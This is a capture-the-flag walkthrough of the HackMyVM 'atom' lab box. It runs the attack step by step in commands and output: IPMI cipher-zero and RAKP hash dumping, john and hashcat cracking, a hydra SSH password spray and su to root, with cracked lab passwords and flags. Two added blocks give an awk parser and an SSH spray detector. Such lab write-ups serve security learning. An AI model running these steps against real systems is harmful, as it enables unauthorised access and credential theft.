[hackmyvm] atom write-up
城南花已开 Lv5

nmap information gathering

This is an easy box. I expected it to be routine, but nmap only found port 22, which left me with nothing to go on at the start, hhh

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0c (Unknown: locally administered)
192.168.56.100 08:00:27:8e:6d:12 (Unknown)
192.168.56.115 08:00:27:dd:d0:ad (Unknown) ## target IP

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.881 seconds (136.10 hosts/sec). 3 responded
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -A -p- 192.168.56.115 ## I even added the all-ports flag, damn, I was dumbfounded
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-06 08:34 EDT
Nmap scan report for 192.168.56.115
Host is up (0.00091s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
|_ 256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
MAC Address: 08:00:27:DD:D0:AD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.91 ms 192.168.56.115

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.26 seconds

With no other lead I looked at a walkthrough (reading WPs is part of learning): by default nmap only scans TCP,

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -sV --version-intensity 0 -n -F -T4 192.168.56.115
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-06 08:42 EDT
Warning: 192.168.56.115 giving up on port because retransmission cap hit (6).
Nmap scan report for 192.168.56.115
Host is up (0.00060s latency).
Not shown: 56 closed udp ports (port-unreach), 43 open|filtered udp ports (no-response)
PORT STATE SERVICE VERSION
623/udp open asf-rmcp
MAC Address: 08:00:27:DD:D0:AD (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.74 seconds

-sU scans UDP, but it is slow, so I also added the version detection intensity flag --version-intensity 0; details below

  • -sU: tells nmap to scan only UDP ports. By default nmap scans both TCP and UDP ports, but if you are only interested in UDP ports you can use this option.
  • -sV: makes nmap try to determine the service version on the target's open ports. It does this by sending a series of probes to the port and parsing the responses.
  • --version-intensity 0: adjusts the intensity of version detection. Intensity ranges from 0 to 9, where 0 is a very light check (only a few basic probes) and 9 is the most thorough (it may send a large number of probes, take more time and expose more scanning activity).
  • -n: tells nmap not to do DNS resolution during the scan. This speeds up the scan, especially across many IP addresses, where DNS resolution can become a bottleneck.
  • -F: short for --fast, makes nmap scan faster. It reduces the number of ports scanned (only the 100 most common) and may reduce scan time or the number of probes sent. This is useful for quickly getting basic information about a target.
  • -T4: sets the timing template. nmap provides several timing templates (0 to 5), where 0 is the slowest (most stealthy) and 5 the fastest (but more easily detected). -T4 is a medium-speed setting that trades off scan speed against stealth.

nmap is actually a very capable tool; it can also run scripts, which I used for the first time here. Besides nmap, Metasploit can also detect the version; I've pasted that below.

IPMI service

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --script ipmi-version -p 623 192.168.56.115 ## using the ipmi-version NSE script
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-06 08:46 EDT
Nmap scan report for 192.168.56.115
Host is up (0.00054s latency).

PORT STATE SERVICE
623/udp open asf-rmcp
| ipmi-version:
| Version:
| IPMI-2.0 ## version 2.0, which usually has vulnerabilities
| UserAuth: password, md5, md2, null
| PassAuth: auth_msg, auth_user, non_null_user
|_ Level: 1.5, 2.0
MAC Address: 08:00:27:DD:D0:AD (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
msf6 > search ipmi

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ipmi/ipmi_cipher_zero 2013-06-20 normal No IPMI 2.0 Cipher Zero Authentication Bypass Scanner
1 auxiliary/scanner/ipmi/ipmi_dumphashes 2013-06-20 normal No IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval
2 auxiliary/scanner/ipmi/ipmi_version normal No IPMI Information Discovery ### this is the one
3 exploit/multi/upnp/libupnp_ssdp_overflow 2013-01-29 normal No Portable UPnP SDK unique_service_name() Remote Code Execution
4 auxiliary/scanner/http/smt_ipmi_cgi_scanner 2013-11-06 normal No Supermicro Onboard IPMI CGI Vulnerability Scanner
5 auxiliary/scanner/http/smt_ipmi_49152_exposure 2014-06-19 normal No Supermicro Onboard IPMI Port 49152 Sensitive File Exposure
6 auxiliary/scanner/http/smt_ipmi_static_cert_scanner 2013-11-06 normal No Supermicro Onboard IPMI Static SSL Certificate Scanner
7 exploit/linux/http/smt_ipmi_close_window_bof 2013-11-06 good Yes Supermicro Onboard IPMI close_window.cgi Buffer Overflow
8 auxiliary/scanner/http/smt_ipmi_url_redirect_traversal 2013-11-06 normal No Supermicro Onboard IPMI url_redirect.cgi Authenticated Directory Traversal


Interact with a module by name or index. For example info 8, use 8 or use auxiliary/scanner/http/smt_ipmi_url_redirect_traversal

msf6 > use 2
msf6 auxiliary(scanner/ipmi/ipmi_version) > show options

Module options (auxiliary/scanner/ipmi/ipmi_version):

Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/u
sing-metasploit/basics/using-metasploit.html
RPORT 623 yes The target port (UDP)
THREADS 10 yes The number of concurrent threads


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ipmi/ipmi_version) > set RhOSTS 192.168.56.115
RhOSTS => 192.168.56.115
msf6 auxiliary(scanner/ipmi/ipmi_version) > exploit

[*] Sending IPMI requests to 192.168.56.115->192.168.56.115 (1 hosts)
[+] 192.168.56.115:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0) ## this also shows the version info
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I found the exploitation method on the HackTricks site


Following the documentation, run the Metasploit auxiliary scanner

msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > show options 

Module options (auxiliary/scanner/ipmi/ipmi_cipher_zero):

Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/u
sing-metasploit/basics/using-metasploit.html
RPORT 623 yes The target port (UDP)
THREADS 10 yes The number of concurrent threads


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > set RhOSTS 192.168.56.115
RhOSTS => 192.168.56.115
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > exploit

[*] Sending IPMI requests to 192.168.56.115->192.168.56.115 (1 hosts)
[+] 192.168.56.115:623 - IPMI - VULNERABLE: Accepted a session open request for cipher zero ## it says accepted, so this vulnerability can be exploited
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) >

Next, use ipmitool to list the other usernames and change passwords. But first msf has to enumerate a username and password so we can connect to the remote server; only then can ipmitool fetch the user list.

msf6 > use 1
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

Name Current Setting Required Description
---- --------------- -------- -----------
CRACK_COMMON true yes Automatically crack common passwords as
they are obtained
OUTPUT_HASHCAT_FILE no Save captured password hashes in hashca
t format
OUTPUT_JOHN_FILE no Save captured password hashes in john t
he ripper format
PASS_FILE /usr/share/metasploit-f yes File containing common passwords for of
ramework/data/wordlists fline cracking, one per line
/ipmi_passwords.txt
RHOSTS yes The target host(s), see https://docs.me
tasploit.com/docs/using-metasploit/basi
cs/using-metasploit.html
RPORT 623 yes The target port
SESSION_MAX_ATTEMPTS 5 yes Maximum number of session retries, requ
ired on certain BMCs (HP iLO 4, etc)
SESSION_RETRY_DELAY 5 yes Delay between session retries in second
s
THREADS 1 yes The number of concurrent threads (max o
ne per host)
USER_FILE /usr/share/metasploit-f yes File containing usernames, one per line
ramework/data/wordlists
/ipmi_users.txt


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set RhOSTS 192.168.56.115
RhOSTS => 192.168.56.115
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > exploit

[+] 192.168.56.115:623 - IPMI - Hash found: admin:a33a715f02020000a5983950706d218ab0474064ec26f7b3ae3d0b67cf10c73f932bdddfd30be8e7a123456789abcdefa123456789abcdef140561646d696e:6724ccc198e5339b2ce222ddbeb665e4596efd17
[+] 192.168.56.115:623 - IPMI - Hash for user 'admin' matches password 'cukorborso' ## it came out almost instantly
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So connect with ipmitool; I looked up how to use it on the spot

┌──(kali㉿kali)-[~]
└─$ ipmitool -I lanplus -C 0 -H 192.168.56.115 -U admin -P cukorborso user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
1 true false false Unknown (0x00)
2 admin true false true ADMINISTRATOR
3 analiese true false true USER
4 briella true false true USER
5 richardson true false true USER
6 carsten true false true USER
7 sibylle true false true USER
8 wai-ching true false true USER
9 jerrilee true false true USER
10 glynn true false true USER
11 asia true false true USER
12 zaylen true false true USER
13 fabien true false true USER
14 merola true false true USER
15 jem true false true USER
16 riyaz true false true USER
17 laten true false true USER
18 cati true false true USER
19 rozalia true false true USER
20 palmer true false true USER
21 onida true false true USER
22 terra true false true USER
23 ranga true false true USER
24 harrie true false true USER
25 pauly true false true USER
26 els true false true USER
27 bqb true false true USER
28 karlotte true false true USER
29 zali true false true USER
30 ende true false true USER
31 stacey true false true USER
32 shirin true false true USER
33 kaki true false true USER
34 saman true false true USER
35 kalie true false true USER
36 deshawn true false true USER
37 mayeul true false true USER
38 true false false Unknown (0x00)
39 true false false Unknown (0x00)
40 true false false Unknown (0x00)
41 true false false Unknown (0x00)
42 true false false Unknown (0x00)
43 true false false Unknown (0x00)
44 true false false Unknown (0x00)
45 true false false Unknown (0x00)
46 true false false Unknown (0x00)
47 true false false Unknown (0x00)
48 true false false Unknown (0x00)
49 true false false Unknown (0x00)
50 true false false Unknown (0x00)
51 true false false Unknown (0x00)
52 true false false Unknown (0x00)
53 true false false Unknown (0x00)
54 true false false Unknown (0x00)
55 true false false Unknown (0x00)
56 true false false Unknown (0x00)
57 true false false Unknown (0x00)
58 true false false Unknown (0x00)
59 true false false Unknown (0x00)
60 true false false Unknown (0x00)
61 true false false Unknown (0x00)
62 true false false Unknown (0x00)
63 true false false Unknown (0x00)

ipmitool: the base command that invokes the IPMI tool.

-I lanplus: specifies the IPMI interface to use.

  • lanplus means the LAN interface, communicating over the IPMI v2.0 secure protocol. This is the recommended method for remote management.

-C 0: specifies the cipher suite used for authentication.

  • 0 means no particular cipher suite is specified; the first available cipher suite is used by default. The cipher suite determines the level and type of encryption used between the client (ipmitool) and the IPMI interface.

-H 192.168.56.115: specifies the target IP address of the managed device.

  • 192.168.56.115 is the IP address of the BMC (Baseboard Management Controller) or IPMI device you want to talk to.

-U admin: specifies the username used for authentication.

  • admin is the username used to access the IPMI interface.

-P cukorborso: specifies the password used for authentication.

  • cukorborso is the password associated with the admin user.

user list: the IPMI command to execute.

  • user list retrieves the list of all IPMI users configured on the target device.

Exploiting with IPMI tools

There seem to be quite a few users, but I was stuck again. Since the earlier TCP scan showed port 22 open, I tried logging in to SSH with the IPMI username and password; uh, that didn't work. ipmitool can only change user passwords, not view them, but fortunately there's a script on GitHub that can retrieve the passwords (like the msf enumeration above, it also dumps hashes), so let's try it.


c0rnf13ld/ipmiPwner: Exploit to dump ipmi hashes (github.com)

First git clone the project onto Kali and run requirements.sh to install the dependencies; I checked and my machine already had them all, so I didn't run it.

┌──(kali㉿kali)-[~/atom]
└─$ git clone https://gitclone.com/github.com/c0rnf13ld/ipmiPwner.git
Cloning into 'ipmiPwner'...
remote: 对象计数中: 8, 完成.
remote: 压缩对象中: 100% (6/6), 完成.
remote: Total 8 (delta 1), reused 8 (delta 1)
Unpacking objects: 100% (8/8), 6.72 KiB | 1.12 MiB/s, done.
┌──(kali㉿kali)-[~/atom]
└─$ cd ipmiPwner
┌──(kali㉿kali)-[~/atom/ipmiPwner]
└─$ cat requirements.sh
#!/bin/bash

if [ "$(id -u)" -ne 0 ]; then
echo -e "\n[*] You must be root to run the script"
exit
fi

function ctrl_c(){
tput cnorm
echo -e "\n\n[*] Exiting...\n"
exit
}

trap ctrl_c int
tput civis; echo -ne "\n\n[*] Installing requirements\n\n"
apt-get install ipmitool nmap python3 python3-pip -y ## it just installs these packages
echo -ne "\n\n[*] Installing python3 requirements\n\n"
pip3 install shodan colorama python-nmap ## and a few Python libraries
echo -ne "\n\n[*] All requirements have been installed\n"; tput cnorm


But it needs a user list, so use awk to filter the users out. To help understand awk (a very powerful text-processing tool) I paste an example below; note that in our case the separator is a space.

Input separator

Suppose there is a text file test.txt with the following content: 4 lines, each split into three elements by commas. We'll now split it into columns in a few different ways.

cat test.txt

sample1,male,12
sample2,female,23
sample3,male,15
sample4,female,28

1. First method: the -F parameter

Specify the separator with the -F parameter. Note that the separator follows -F directly (with no space in between).

awk -F, '{print $2}' test.txt

male
female
male
female

awk text processing

┌──(kali㉿kali)-[~/atom/ipmiPwner]
└─$ ipmitool -I lanplus -C 0 -H 192.168.56.115 -U admin -P cukorborso user list|awk -F '[ ]' '{print $3}'|uniq -u >user
## uniq -u drops the duplicated lines
┌──(kali㉿kali)-[~/atom/ipmiPwner]
└─$ cat user
Name ## delete this one by hand; the rest are all usernames
glynn
asia
zaylen
fabien
merola
jem
riyaz
laten
cati
rozalia
palmer
onida
terra
ranga
harrie
pauly
els
bqb
karlotte
zali
ende
stacey
shirin
kaki
saman
kalie
deshawn
mayeul

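The awk section above and the pipeline that produced the user file are worth a closer look together. Below is an added example (my own code, not from the original write-up or the ipmiPwner project) that parses a constructed copy of the `ipmitool user list` table two ways. The robust version uses awk's default whitespace splitting, skips the header row and the empty slots, and returns every named user. The second function is the write-up's own pipeline: with a single-space separator, the field index depends on how many digits the ID has, so "10  glynn" lands in $3 but "2   admin" lands in $4. That is why the extracted list above starts at glynn and the one-digit-ID users (admin through jerrilee) are missing, and why "Name" survives as a line that had to be deleted by hand.

```shell
# Added example (not from the original write-up): pulling the usernames out of
# "ipmitool user list" output with awk. The table below is constructed to mirror
# the layout ipmitool printed on the box: a 4-character-wide ID column, a header
# row, and slots whose Name field is empty.
SAMPLE_USER_LIST='ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      false      Unknown (0x00)
2   admin            true    false      true       ADMINISTRATOR
9   jerrilee         true    false      true       USER
10  glynn            true    false      true       USER
11  asia             true    false      true       USER
38                   true    false      false      Unknown (0x00)
39                   true    false      false      Unknown (0x00)'

# Robust extraction: awk default field splitting collapses runs of blanks, so the
# name is always $2 when present. Skip the header (NR > 1) and skip empty slots,
# where the Callin value "true"/"false" shifts into $2 because Name is blank.
extract_ipmi_users() {
    awk 'NR > 1 && $2 != "true" && $2 != "false" { print $2 }'
}

# The write-up's pipeline, kept for comparison: -F '[ ]' splits on every single
# space, so the field holding the name depends on how many digits the ID has.
# "10  glynn" puts glynn in $3, but "2   admin" puts admin in $4, so one-digit
# IDs are dropped. uniq -u then removes the runs of identical empty lines.
extract_ipmi_users_single_space() {
    awk -F '[ ]' '{ print $3 }' | uniq -u
}

echo "[robust]"
printf '%s\n' "$SAMPLE_USER_LIST" | extract_ipmi_users
echo "[single-space separator]"
printf '%s\n' "$SAMPLE_USER_LIST" | extract_ipmi_users_single_space
```

Feed real output to the robust function with `ipmitool ... user list | extract_ipmi_users > user`; it needs no manual cleanup of the header line.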
Let's test the waters with the user glynn to see whether the script works

┌──(kali㉿kali)-[~/atom/ipmiPwner]
└─$ sudo python3 ipmipwner.py --host 192.168.56.115 -u glynn -c john -pW /usr/share/wordlists/rockyou.txt -oH hash
[*] Checking if port 623 for host 192.168.56.115 is active
[*] The username: glynn is valid
[*] Saving hash for user: glynn in file: "hash"
[*] The hash for user: glynn
\_ $rakp$a4a3a2a0820c00003e6590e5a4eafbafffd2cb46e796bafcf7bb91a2d4efbf5bb6d97179e60f1e57a123456789abcdefa123456789abcdef1405676c796e6e$82cf7025b77994028f0357833efc33cd1ea8d32d
[*] Starting the hash cracking with john

Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (RAKP, IPMI 2.0 RAKP (RMCP+) [HMAC-SHA1 128/128 AVX 4x])
Will run 8 OpenMP threads
Press Ctrl-C to abort, or send SIGUSR1 to john process for status
evan (192.168.56.115 glynn) ## evan is glynn's password
1g 0:00:00:00 DONE (2024-09-06 10:21) 50.00g/s 6553Kp/s 6553Kc/s 6553KC/s 123456..kovacs
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

According to the project documentation, -c john means that once the hash is obtained it is run through john against the rockyou wordlist to get the password.

So crack the hashes in bulk with the user file... er, it seems you can't just hand it the user file and have it crack them automatically.

So write a loop

┌──(kali㉿kali)-[~/atom/ipmiPwner]
└─$ for i in $(cat user);do sudo python3 ipmipwner.py --host 192.168.56.115 -u $i -c john -pW /usr/share/wordlists/rockyou.txt -oH hash>>pass;done ## a for loop over the strings in the user file, passing the variable $i to -u; it works, just a little slow, wait a bit longer

Once done, cat the pass file; it's too cluttered, so try filtering it with grep and awk

Honestly I'm not very good with these two tools; I could only ask GPT step by step

┌──(kali㉿kali)-[~/atom/ipmiPwner]
└─$ cat pass | grep -A 1 "Loaded" |awk '{print $1}'| awk '/Loaded/{p=NR+1} p==NR'
evan
TWEETY1
120691
chatroom
mackenzie2
081704
djones
trick1
122987
batman!
phones
jiggaman
sexymoma
jaffa1
071590
515253
dezzy
290992
emeralds
poynter
tripod
castillo1
kittyboo
numberone
090506
billandben
milo123
241107

┌──(kali㉿kali)-[~/atom/ipmiPwner]
└─$ cat pass | grep -A 1 "Loaded" |awk '{print $1}'| awk '/Loaded/{p=NR+1} p==NR'>password

Brute-forcing with hydra

Finally, brute-force SSH with hydra

┌──(kali㉿kali)-[~/atom/ipmiPwner]
└─$ hydra -L user -P password 192.168.56.115 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-06 11:15:56
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 784 login tries (l:28/p:28), ~49 tries per task
[DATA] attacking ssh://192.168.56.115:22/
[STATUS] 318.00 tries/min, 318 tries in 00:01h, 467 to do in 00:02h, 15 active
[22][ssh] host: 192.168.56.115 login: onida password: jiggaman ## actually found one; log in straight away and take a look
[STATUS] 301.50 tries/min, 603 tries in 00:02h, 183 to do in 00:01h, 14 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-06 11:18:41
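The hydra run above leaves a dense trail in the target's auth log: hundreds of "Failed password" lines from one source, then a single "Accepted password". As an added example (my own code, not from the original write-up), here is a small POSIX sh/awk detector over constructed auth.log lines in the Debian/OpenSSH format. It reports sources that reach an assumed failure threshold (default 5) and, the higher-priority alert, a successful password login from a source that had already crossed that threshold, which is exactly the onida:jiggaman outcome seen above. IPs, PIDs and timestamps in the sample are made up.

```shell
# Added example (not from the original write-up): flagging the SSH password spray
# that hydra leaves behind in sshd's auth log. The lines below are constructed in
# the Debian/OpenSSH auth.log format; the IPs, PIDs and timestamps are made up.
SAMPLE_AUTH_LOG='Sep  6 11:15:57 atom sshd[1201]: Failed password for invalid user glynn from 192.168.56.102 port 40112 ssh2
Sep  6 11:15:57 atom sshd[1203]: Failed password for invalid user asia from 192.168.56.102 port 40114 ssh2
Sep  6 11:15:58 atom sshd[1205]: Failed password for onida from 192.168.56.102 port 40116 ssh2
Sep  6 11:15:58 atom sshd[1207]: Failed password for invalid user terra from 192.168.56.102 port 40118 ssh2
Sep  6 11:15:59 atom sshd[1209]: Failed password for onida from 192.168.56.102 port 40120 ssh2
Sep  6 11:16:40 atom sshd[1301]: Accepted password for onida from 192.168.56.102 port 40220 ssh2
Sep  6 11:20:03 atom sshd[1402]: Failed password for root from 10.0.0.5 port 51000 ssh2
Sep  6 11:21:10 atom sshd[1410]: Accepted publickey for onida from 10.0.0.9 port 52000 ssh2'

# spray_sources [limit]: one line "<ip> <failures> <distinct users>" per source
# with at least <limit> failed password logins (default 5, an assumed threshold).
# The source IP is the token after "from"; the user name is the token before it,
# which works for both "for <user> from" and "for invalid user <user> from".
spray_sources() {
    awk -v limit="${1:-5}" '
        /sshd\[[0-9]+\]: Failed password for / {
            for (i = 1; i <= NF; i++) if ($i == "from") { ip = $(i + 1); user = $(i - 1) }
            fails[ip]++
            if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
        }
        END { for (ip in fails) if (fails[ip] >= limit) print ip, fails[ip], users[ip] }'
}

# success_after_spray [limit]: "<ip> <user>" for every successful password login
# from a source that had already reached <limit> failures earlier in the log.
# A match is the high-priority alert: the spray found a working credential.
success_after_spray() {
    awk -v limit="${1:-5}" '
        /sshd\[[0-9]+\]: Failed password for / {
            for (i = 1; i <= NF; i++) if ($i == "from") ip = $(i + 1)
            fails[ip]++
        }
        /sshd\[[0-9]+\]: Accepted password for / {
            for (i = 1; i <= NF; i++) if ($i == "from") { ip = $(i + 1); user = $(i - 1) }
            if (fails[ip] >= limit) print ip, user
        }'
}

echo "[sources at or above the threshold]"
printf '%s\n' "$SAMPLE_AUTH_LOG" | spray_sources
echo "[password logins that followed a spray]"
printf '%s\n' "$SAMPLE_AUTH_LOG" | success_after_spray
```

On a real host, run `spray_sources 20 < /var/log/auth.log` (or pipe `journalctl -u ssh` into it); the distinct-user count separates a spray across many accounts, as in the hydra run, from a single user mistyping a password.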

Log in as onida

┌──(kali㉿kali)-[~/atom/ipmiPwner]
└─$ ssh onida@192.168.56.115
onida@192.168.56.115's password:
Linux atom 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
onida@atom:~$ sudo -l
-bash: sudo: command not found
onida@atom:~$ ls
user.txt
onida@atom:~$ cat user.txt
f75390001fa2fe806b4e3f1e5dadeb2b
onida@atom:~$

Once logged in over SSH, the user flag was right there.

Privilege escalation to root

Information gathering

After getting in, I poked around the directories and found a www site; I also checked the open ports and found two that are only open on localhost

onida@atom:~$ cd /var/www/html/
onida@atom:/var/www/html$ ls ## there's a .db database file here
atom-2400-database.db css img index.php js login.php profile.php register.php video
onida@atom:/var/www/html$ ss -ltup
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:asf-rmcp 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:36269 0.0.0.0:* ##
tcp LISTEN 0 4096 0.0.0.0:623 0.0.0.0:*
tcp LISTEN 0 511 127.0.0.1:http 0.0.0.0:* ##
tcp LISTEN 0 128 0.0.0.0:ssh 0.0.0.0:*
tcp LISTEN 0 128 [::]:ssh [::]:*

There's a database file; I cat'd it and, as expected, it should hold root's password, since the machine is named atom

onida@atom:/var/www/html$ cat atom-2400-database.db 
Q�Y�&��mtableusersusersCREATE TABLE users (
id INTEGER PRIMARY KEY,
username TEXT UNIQUE NOT NULL,
password TEXT NOT NULL
))=indexsqlite_autoindex_users_1user�$))�tablelogin_attemptslogin_attemptsCREATE TABLE login_attempts (
id INTEGER PRIMARY KEY,
ip_address TEXT NOT NULL,
attempt_time INTEGER NOT NULL
��nKE�atom$2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohYOiBQqG7pK1F2fH9Cm
��� atom


onida@atom:/var/www/html$

But it displays as garbage. The box actually has sqlite installed, so look at it with the database tool; well, cat works too, it's just less readable.

onida@atom:/var/www/html$ sqlite3 atom-2400-database.db 
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables ## see below
login_attempts users
sqlite> select * from users;
1|atom|$2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohYOiBQqG7pK1F2fH9Cm ## user atom's hash
sqlite>

.tables is a SQLite3 command-line command that lists all the tables in the current database

Besides .tables, there are other commands for showing all tables:

  1. .schema: shows the CREATE statements for all tables in the database, including columns, constraints and so on.
  2. SELECT name FROM sqlite_master WHERE type='table': an SQL query can also be used to view all tables in the database; this returns the names of all tables.

Now that we have the hash, just throw john at it, or hashcat, whichever you prefer

Below I use hashcat; I think hashcat has more features, john is too brainless hhhhh

hashcat -m 3200 -a 0 pass /usr/share/seclists/Passwords/500-worst-passwords.txt ## this wordlist is faster
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-12th Gen Intel(R) Core(TM) i5-12600KF, 2915/5894 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/seclists/Passwords/500-worst-passwords.txt
* Passwords.: 499
* Bytes.....: 3491
* Keyspace..: 499
* Runtime...: 0 secs

$2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohYOiBQqG7pK1F2fH9Cm:madison ## this is the password

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohYOiBQqG7p...2fH9Cm
Time.Started.....: Sat Sep 7 03:42:24 2024 (3 secs)
Time.Estimated...: Sat Sep 7 03:42:27 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/seclists/Passwords/500-worst-passwords.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 127 H/s (3.26ms) @ Accel:8 Loops:8 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 448/499 (89.78%)
Rejected.........: 0/448 (0.00%)
Restore.Point....: 384/499 (76.95%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1016-1024
Candidate.Engine.: Device Generator
Candidates.#1....: erotic -> arthur
Hardware.Mon.#1..: Util: 79%

Started: Sat Sep 7 03:41:59 2024
Stopped: Sat Sep 7 03:42:29 2024
onida@atom:~$ su -
Password:
root@atom:~# ls
root.txt
root@atom:~# cat root.txt
d3a4fd660f1af5a7e3c2f17314f4a962

Done. Honestly, apart from the IPMI part at the start, nothing later was hard; it does count as easy.

Damn, it took me almost four hours
